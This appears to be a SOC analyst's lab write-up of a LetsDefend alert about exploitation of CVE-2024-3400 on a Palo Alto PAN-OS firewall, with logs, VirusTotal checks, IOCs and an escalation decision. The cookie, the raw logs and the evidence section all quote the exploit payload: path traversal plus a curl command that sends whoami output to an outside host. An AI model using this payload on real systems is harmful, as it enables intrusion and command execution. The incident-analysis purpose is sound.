SOC274 — Palo Alto Networks PAN-OS Command Injection Vulnerability Exploitation (CVE-2024–3400)

by Tomasz Kozlowski

Ticket INFO:

A critical command injection vulnerability has been identified in Palo Alto Networks PAN-OS software

EventID :

249

Event Time :

Apr, 18, 2024, 03:09 AM

Rule :

SOC274 — Palo Alto Networks PAN-OS Command Injection Vulnerability Exploitation (CVE-2024–3400)

Level :

Security Analyst

Hostname :

PA-Firewall-01

Destination IP Address :

172.16.17.139

Source IP Address :

144.172.79.92

HTTP Request Method :

POST

Requested URL :

172.16.17.139/global-protect/login.esp

cookie :

SESSID=./../../../opt/panlogs/tmp/device_telemetry/hour/aaa`curl${IFS}144.172.79.92:4444?user=$(whoami)

Alert Trigger Reason :

Characteristics exploit pattern Detected on Cookie and Request, indicative exploitation of the CVE-2024–3400.

Device Action :

Allowed.

SOC Analyst Action:

Checking Log Managment Tab for 144(.)172.79.92 and VirusTotal.

Logs:

RAW LOG

2024–04–18 15:09:42,628: dt_send INFO TX_DIR: send file dir: /opt/panlogs/tmp/device_telemetry/day/, n_files: 1

2024–04–18 15:09:42,628 : dt_send INFO sorted file list: tmp_dir: /opt/panlogs/tmp/device_telemetry/day/*2024–04–18 15:09:42,629: dt_send INFO TX_DIR: send file dir: fname: /opt/panlogs/tmp/device_telemetry/day/aaa`curl${IFS}144.172.79.92:4444?user=$(whoami)2024–04–18 15:09:42,629 : dt_send INFO TX FILE: send_fname: /opt/panlogs/tmp/device_telemetry/day/aaa`curl${IFS}144.172.79.92:4444?user=$(whoami)2024–04–18 15:09:42,630: dt_send INFO TX_FILE: dest server ip: 144.172.79.922024–04–18 15:09:42,630 : dt_send INFO TX FILE: send_file_cmd: /usr/local/bin/dt_curl -i 172.16.17.139 -f /opt/panlogs/tmp/device_telemetry/day/aaa`curl${IFS}144.172.79.92:4444?user=$(whoami)2024–04–18 15:09:43,152: dt_send INFO TX FILE: curl cmd status: 24, 24; err msg: ‘DNS lookup failed’

VirusTotal:12 security vendors flagged this IP as malicious.

hxxps://www.virustotal.com/gui/ip-address/144.172.79.92/community

Checks on Endpoint security:

Event Time :

Apr 18 2024 15:09:55

Process ID :

1233

Target Process Command Line :

/usr/libexec/mgmtsrvr/start

Image Path :

/usr/bin/python3

Image Hash :

3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927…

Process User :

letsdefend

Parent Name :

systemd

Parent Path :

/lib/systemd/systemd

Command Line :

/usr/bin/python3 update.py

Hash confirmed by Virus Total:

hxxps://www.virustotal.com/gui/file/3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac

Case :

Malicious.

The answer is Command injection.

Not planned

Internet -Company Network.

Yes.

Action : Escalation to TIER 2 and contamination of the server until further investigation and remediation. Confirmed Command injection attack.

Evidence:

IP 144.172.79[.]92
Cookie SESSID=./../../../opt/panlogs/tmp/device_telemetry/hour/aaa
`curl${IFS}144.172.79[.]92:4444?user=$(whoami)
File update.py
Hash :

MD5

0c1554888ce9ed0da1583dbdf7b31651

SHA-1

988fc0d23e6e30c2c46ccec9bbff50b7453b8ba9

SHA-256

3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac

URL 172[.]16.17.139/global-protect/login.esp

Verdict: TRUE POSITIVE

Thanks All.

Tomasz Kozlowski

Cyber Security Analyst.